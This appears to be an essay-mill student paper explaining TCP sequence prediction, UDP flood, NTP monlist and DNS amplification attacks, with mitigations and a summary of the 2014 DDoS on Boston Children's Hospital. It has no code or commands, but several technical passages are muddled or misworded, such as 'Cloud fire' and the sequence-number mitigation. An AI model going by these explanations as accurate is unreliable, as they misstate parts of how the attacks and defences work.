TCP Sequence Attack Essay

On the one hand, Transmission Control Protocol (TCP) prediction attack is used to predict the sequence number used in the identification of the TCP connection packets which are utilized by counterfeit packages (Luo & Yang, 2014).

Is your time best spent reading someone else’s essay? Get a 100% original essay FROM A CERTIFIED WRITER!

Save 25%

How It Works

The TCP attack works when the attacker puts hopes in correctly guessing the sequence number used from the sending of a host. If they realize this goal, the attackers are better placed in sending counterfeit packets to receiving host who comes from the original host. This is regardless of the fact that the fake packages arrive from a third host in control of the attacker. The attack can happen if the attackers listen to the conversation that occurs between trusted hosts and proceeds to issue packets by utilizing the same IP address which is the source. Through monitoring traffic before the occurrence of an attack, a malicious hosts figure out the right sequence number. After the correct sequence number and IP address are ascertained, it becomes a race between the trusted host and the attacker to acquire the appropriate sent packet. A conventional means of attackers launching an attack on the trusted host is through the Denial-of-Service attack. Immediately the attacker is in control of the connection; it has the capacity of sending counterfeit packets without acquiring support. When an attacker is capable of delivering false packages of this type, he or she can cause a lot of mischiefs which includes injecting an existing data of TCP connection of choice for an attacker. It is also caused by the premature closure of a current contact of TCP by inserting counterfeit packets with the bit set of RST (Luo & Yang, 2014).

UDP Flood Attack

A UDP flood attack refers to the Denial-of-service (DoS) attack. It involves the use of the User Datagram Protocol (UDP), which is a protocol in computer networking which does not require any connection. Through the use of UDP for denial-of-service attacks, it lacks straightforwardness such as the Transmission Control Protocol (TCP). The initiation of a UDP flood attack can occur through sending bulky numbers of UDP packets. This will allow the remote host to reply with a packet called the ICMP Destination Unreachable. Therefore, large numbers of UDP packets forces victimized systems to send many packets of ICMP. This leads to blocking reach for other clients. Additionally, the attackers can spoof the UDP packet's IP address, which will prevent it from being reached by the excessive return ICMP packets (Hussain & Beigh, 2013). The UDP packets will also ensure that the network locations of clients are anonymous.

How It Works

A UDP flood attack works through the exploitation of the steps which a server takes in responding to UDP packets sent to its ports. In typical situations, serves to receive UDP packets at given ports undergo two main steps. The first step is the server firstly checking to ascertain if any running programs are listening for port requests at particular ports presently. The second step is if there are no programs which receive packets at the given port, there is a response from the server with ping (ICMP) packet. This, in turn, informs the sender about why a destination is not reachable (Hussain & Beigh, 2013).

NTP Monlist

NTP has a command in the form of monlist. The monlist command is sent to a server of NTP for purposes of monitoring. The monlist command helps in addressing at least 600 machines which have interacted with the NTP server. The response is often more significant than the sent request, which makes it possible for the occurrence of an amplification attack (Hussain & Beigh, 2013).

DNS DDoS Attack

DNS amplification refers to a Distributed Denial of Service (DDoS) attack where an attacker exploits domain name system (DNS) server vulnerabilities. The exploitation functions in making larger payloads from small queries used in attacking the servers of victims. DNS amplification, as a form of attack, manipulates the name systems of publically-accessible domains, resulting in flooding of targets with large UDP packets. During an attack of DNS, perpetrators send DNS query by forging IP address to a resolver in an open DNS (Hussain & Beigh, 2013).

Mitigation Strategies

The rate of response of many operating systems of ICMP packets is used in disruption of attacks by DDoS which requires the intervention of ICMP. This is a significant strategy used in the mitigation of attacks by UDP floods. A substantial limitation of this mitigation type is that when an attack occurs, there is filtering of legitimate packets in the course of the progress. Cloud fire also helps in the mitigation of UDP flood attacks by dropping every traffic which is connected to the DNS at the network edge.

The conventional approaches in the mitigation of the influence of DNS amplification attacks include strengthening server security of DNS, limiting rates and restricting particular servers of DNS. These methods of reduction of attacks are not entirely successful, and they do not minimize network loads and switching between open recursive and name servers.

A TCP Sequence Prediction Attack is mitigated by increasing the sequence numbers which are used in the generating of sequence numbers. This increases the generation of sequence numbers against monitoring and predictive analysis which allows cybercriminals ease of access to sequence numbers. A more efficient strategy is blocking data packets, and source routed packets with addresses within their networks. Services were relying on authentication of IP-based addresses which reduces connections entirely after detecting the presence of source routed options.

Summary of Events at Boston Children Case Study

The Boston Children's Hospital was the first healthcare company to be a target in 2014 for attacks by DDoS from hackers. The attacks were because the hospital used the same Internet Service Provider (ISP) with seven other healthcare organizations. Accordingly, the planned attacks by DDoS could potentially lead to the decline of many crucial infrastructures of the healthcare of Boston. The offense started with a threat, and it included three significant strikes. The first strike was Pre-Strike Doxing which related to high case custody of a 15-year-old girl with complicated diagnosis when she was under the protective services of Massachusetts. The second attacks were DDoS strike which began in April 2014 when the attackers executed their threats and targeted the external website of the hospital. The multidisciplinary team which was employed to mitigate the attacks identified three crucial issues. The first one was the lack of the ability to route electronic prescriptions to pharmacies. The second one was that the downtime for emails meant for departments and the lack of access to foreign electronic health records. To mitigate the DDoS attacks, the Boston Children's Hospital used the Radware's scrubbing center (McGee, 2014).

References

Hussain, S. M., & Beigh, G. R. (2013). Impact of DDoS attack (UDP Flooding) on queuing models. 2013 4th International Conference on Computer and Communication Technology (ICCCT). doi:10.1109/iccct.2013.6749629

Luo, J., & Yang, X. (2014). The NewShrew attack: A new type of low-rate TCP-Targeted DoS attack. 2014 IEEE International Conference on Communications (ICC). doi:10.1109/icc.2014.6883403

McGee, M. K. (2014, April 25). DDoS Assault on Boston Hospital [Web log post]. Retrieved from https://www.databreachtoday.com/boston-hospital-under-ddos-assault-a-6790